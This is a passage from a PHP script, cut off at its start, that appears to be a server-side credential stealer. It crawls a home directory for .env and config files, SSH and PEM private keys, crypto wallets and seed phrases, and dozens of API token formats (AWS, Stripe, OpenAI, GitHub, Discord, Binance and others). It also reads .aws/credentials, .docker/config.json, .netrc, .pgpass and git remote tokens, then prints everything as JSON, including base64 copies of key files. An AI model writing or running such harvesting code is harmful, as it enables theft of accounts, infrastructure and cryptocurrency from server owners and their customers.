setMaxDepth(6); foreach($it as $fi){ if(!$fi->isFile())continue; $sz=$fi->getSize();if($sz<1||$sz>2000000)continue; $p=$fi->getPathname();$bn=$fi->getFilename(); $do_skip=false; foreach($skip_dirs as $sd)if(strpos($p,'/'.$sd.'/')!==false){$do_skip=true;break;} if($do_skip)continue; $rel=str_replace($home.'/','',$p); $is_cfg=in_array($bn,$cfg_names)||strpos($bn,'.env')===0; $is_key=preg_match('/\.(pem|key|p12|pfx)$/i',$bn)||preg_match('/^id_(rsa|ecdsa|ed25519|dsa)$/',$bn); $is_wallet=stripos($bn,'wallet')!==false||stripos($bn,'keystore')!==false; if(!$is_cfg&&!$is_key&&!$is_wallet)continue; $c2=@file_get_contents($p);if(!$c2)continue; if($is_key||$is_wallet){ if(preg_match('/-----BEGIN\s+(?:RSA\s+|EC\s+|DSA\s+|OPENSSH\s+)?PRIVATE\s+KEY-----/',$c2)){ $keys['PRIVKEY.'.$rel]='[PEM PRIVATE KEY - '.strlen($c2).' bytes]'; if(!isset($files))$files=[]; $files['PRIVKEY.'.$rel]=base64_encode($c2); } $wd=@json_decode($c2,true); if(is_array($wd)){ foreach(['mnemonic','seed','seed_phrase','private_key','privateKey','secret','xpriv','master_seed'] as $wk) if(isset($wd[$wk]))$keys['WALLET.'.$rel.'.'.$wk]=$wd[$wk]; } if($is_wallet||$is_key){ if(!isset($files))$files=[]; $files['FILE.'.$rel]=base64_encode($c2); } } if($is_cfg){ preg_match_all("/define\s*\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]*)['\"]/",$c2,$m,PREG_SET_ORDER); foreach($m as $r)$keys[$rel.'.'.$r[1]]=$r[2]; preg_match_all("/^([A-Z_][A-Z0-9_]*)=(.+)$/m",$c2,$m,PREG_SET_ORDER); foreach($m as $r)$keys[$rel.'.'.$r[1]]=trim($r[2],"\"' \t\r\n"); preg_match_all("/'(database|username|password|host|dbname|key|secret|token|prefix)'\s*=>\s*'([^']+)'/",$c2,$m,PREG_SET_ORDER); foreach($m as $r)$keys[$rel.'.'.$r[1]]=$r[2]; preg_match_all("/\\\$(?:this->)?([a-zA-Z_]+)\s*=\s*['\"]([^'\"]+)['\"]/",$c2,$m,PREG_SET_ORDER); foreach($m as $r)if(in_array(strtolower($r[1]),['password','user','db','host','secret','key','pass','database','dbhost','dbpass','dbuser','dbname','apikey','api_key','token','private_key','mnemonic','seed','wallet','crypt_key','encryption_key','app_key','secret_key']))$keys[$rel.'.'.$r[1]]=$r[2]; preg_match_all('/\b(AKIA[0-9A-Z]{16})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.AWS_ACCESS_KEY_ID']=$v; preg_match_all('/\b(sk_live_[a-zA-Z0-9]{24,})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.STRIPE_SECRET']=$v; preg_match_all('/\b(pk_live_[a-zA-Z0-9]{24,})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.STRIPE_PUBLISH']=$v; preg_match_all('/\b(SG\.[a-zA-Z0-9_-]{22}\.[a-zA-Z0-9_-]{43})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.SENDGRID_API']=$v; preg_match_all('/\b(sk-[a-zA-Z0-9]{20,})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.OPENAI_KEY']=$v; preg_match_all('/\b(xox[bpsar]-[a-zA-Z0-9-]{10,})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.SLACK_TOKEN']=$v; preg_match_all('/\b(key-[a-f0-9]{32})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.MAILGUN_KEY']=$v; preg_match_all('/\b(rk_live_[a-zA-Z0-9]{24,})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.STRIPE_RESTRICTED']=$v; preg_match_all('/\b(AC[a-f0-9]{32})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.TWILIO_SID']=$v; if(preg_match('/-----BEGIN\s+(?:RSA\s+|EC\s+|DSA\s+|OPENSSH\s+)?PRIVATE\s+KEY-----/',$c2)) $keys[$rel.'.PRIVATE_KEY']='[PEM PRIVATE KEY EMBEDDED]'; preg_match_all('/["\']([a-z]{2,8}(?:\s+[a-z]{2,8}){11}(?:\s+[a-z]{2,8}){0,12})["\']/',$c2,$m); foreach($m[1] as $v){$wc=count(explode(' ',$v));if($wc==12||$wc==24)$keys[$rel.'.SEED_PHRASE']=$v;} preg_match_all('/(?:MNEMONIC|SEED_PHRASE|SEED|RECOVERY)\s*=\s*["\']?([a-z ]{20,})["\']?/i',$c2,$m,PREG_SET_ORDER); foreach($m as $r){$v=trim($r[1]);$wc=count(explode(' ',$v));if($wc>=12)$keys[$rel.'.SEED_PHRASE']=$v;} preg_match_all('/(?:private.?key|priv.?key|secret.?key)\s*[=:]\s*["\']?(0x)?([0-9a-fA-F]{64})["\']?/i',$c2,$m,PREG_SET_ORDER); foreach($m as $r)$keys[$rel.'.HEX_PRIVKEY']=($r[1]?:'0x').$r[2]; // Coinbase preg_match_all('/\b(cb_[a-zA-Z0-9_]+_[a-zA-Z0-9]{32,})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.COINBASE']=$v; // Mailchimp preg_match_all('/\b([a-f0-9]{32}-us[0-9]{1,2})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.MAILCHIMP']=$v; // Firebase preg_match_all('/\b(AIza[0-9A-Za-z_-]{35})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.FIREBASE']=$v; // GitHub token preg_match_all('/\b(ghp_[a-zA-Z0-9]{36})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.GITHUB_TOKEN']=$v; // GitHub OAuth preg_match_all('/\b(gho_[a-zA-Z0-9]{36})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.GITHUB_OAUTH']=$v; // npm token preg_match_all('/\b(npm_[a-zA-Z0-9]{36})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.NPM_TOKEN']=$v; // Telegram bot preg_match_all('/\b([0-9]{8,10}:[a-zA-Z0-9_-]{35})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.TELEGRAM_BOT']=$v; // Discord webhook preg_match_all('/discord(?:app)?\.com\/api\/webhooks\/([0-9]+\/[a-zA-Z0-9_-]+)/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.DISCORD_WEBHOOK']=$v; // Discord bot token preg_match_all('/\b([A-Za-z0-9]{24}\.[A-Za-z0-9_-]{6}\.[A-Za-z0-9_-]{27})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.DISCORD_TOKEN']=$v; // PayPal preg_match_all('/\b(A[a-zA-Z0-9_-]{79})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.PAYPAL_CLIENT']=$v; // Google Cloud preg_match_all('/\b(GOOG[\w]{10,30})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.GCLOUD']=$v; // Twilio auth token (32 hex near TWILIO keyword) if(stripos($c2,'twilio')!==false){ preg_match_all('/\b([a-f0-9]{32})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.TWILIO_AUTH']=$v; } // Binance API (64 alnum near BINANCE keyword) if(stripos($c2,'binance')!==false){ preg_match_all('/\b([a-zA-Z0-9]{64})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.BINANCE_KEY']=$v; } // Azure key preg_match_all('/\b([a-zA-Z0-9+\/]{86}==)\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.AZURE_KEY']=$v; // Shopify preg_match_all('/\b(shpat_[a-fA-F0-9]{32})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.SHOPIFY']=$v; // Square preg_match_all('/\b(sq0[a-z]{3}-[a-zA-Z0-9_-]{22,})\b/',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.SQUARE']=$v; // Heroku preg_match_all('/\b([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})\b/',$c2,$m); if(stripos($c2,'heroku')!==false)foreach($m[1] as $v)$keys[$rel.'.HEROKU']=$v; // .git/config URLs with tokens if($bn=='config'&&strpos($p,'.git')!==false){ preg_match_all('/url\s*=\s*https?:\/\/([^@\s]+)@/i',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.GIT_TOKEN']=$v; } // .npmrc auth if($bn=='.npmrc'){ preg_match_all('/_authToken=(.+)$/m',$c2,$m); foreach($m[1] as $v)$keys[$rel.'.NPM_AUTH']=trim($v); } // .netrc creds if($bn=='.netrc'){ preg_match_all('/machine\s+(\S+)\s+login\s+(\S+)\s+password\s+(\S+)/i',$c2,$m,PREG_SET_ORDER); foreach($m as $r)$keys[$rel.'.NETRC_'.$r[1]]=$r[2].':'.$r[3]; } // .my.cnf / .pgpass if($bn=='.my.cnf'||$bn=='.pgpass'){ $keys[$rel.'.DB_CREDS']=substr($c2,0,500); } // docker-compose passwords if(strpos($bn,'docker-compose')!==false){ preg_match_all('/(?:PASSWORD|SECRET|KEY|TOKEN)\s*[:=]\s*["\']?([^\s"\']+)/i',$c2,$m,PREG_SET_ORDER); foreach($m as $r)$keys[$rel.'.'.$r[0]]=$r[1]; } // AWS credentials file if($bn=='credentials'&&strpos($p,'.aws')!==false){ $keys[$rel.'.AWS_CREDS']=substr($c2,0,1000); } // composer auth.json if($bn=='auth.json'){ $j=@json_decode($c2,true); if(is_array($j))foreach($j as $k=>$v)$keys[$rel.'.'.$k]=json_encode($v); } } } // Search .git/config files for tokens foreach(glob($home.'/public_html/*/.git/config') ?: [] as $f){ $c=@file_get_contents($f);if(!$c)continue; preg_match_all('/url\s*=\s*https?:\/\/([^@\s]+)@/i',$c,$m); foreach($m[1] as $v)$keys['GIT.'.basename(dirname(dirname($f))).'.'.$v]=$v; } foreach(glob($home.'/*/.git/config') ?: [] as $f){ $c=@file_get_contents($f);if(!$c)continue; preg_match_all('/url\s*=\s*https?:\/\/([^@\s]+)@/i',$c,$m); foreach($m[1] as $v)$keys['GIT.'.basename(dirname(dirname($f))).'.'.$v]=$v; } // Search .aws/credentials $aws=@file_get_contents($home.'/.aws/credentials'); if($aws)$keys['AWS_CREDENTIALS']=substr($aws,0,1000); // Search .docker/config.json $dk=@file_get_contents($home.'/.docker/config.json'); if($dk){$j=@json_decode($dk,true);if(isset($j['auths']))$keys['DOCKER_AUTHS']=json_encode($j['auths']);} // Search .composer/auth.json $ca=@file_get_contents($home.'/.composer/auth.json'); if($ca)$keys['COMPOSER_AUTH']=$ca; // Search .s3cfg $s3=@file_get_contents($home.'/.s3cfg'); if($s3){preg_match('/secret_key\s*=\s*(.+)/i',$s3,$m);if(!empty($m[1]))$keys['S3_SECRET']=trim($m[1]);} }catch(Exception $e){} echo json_encode(['keys'=>$keys,'files'=>isset($files)?$files:[]]); ?>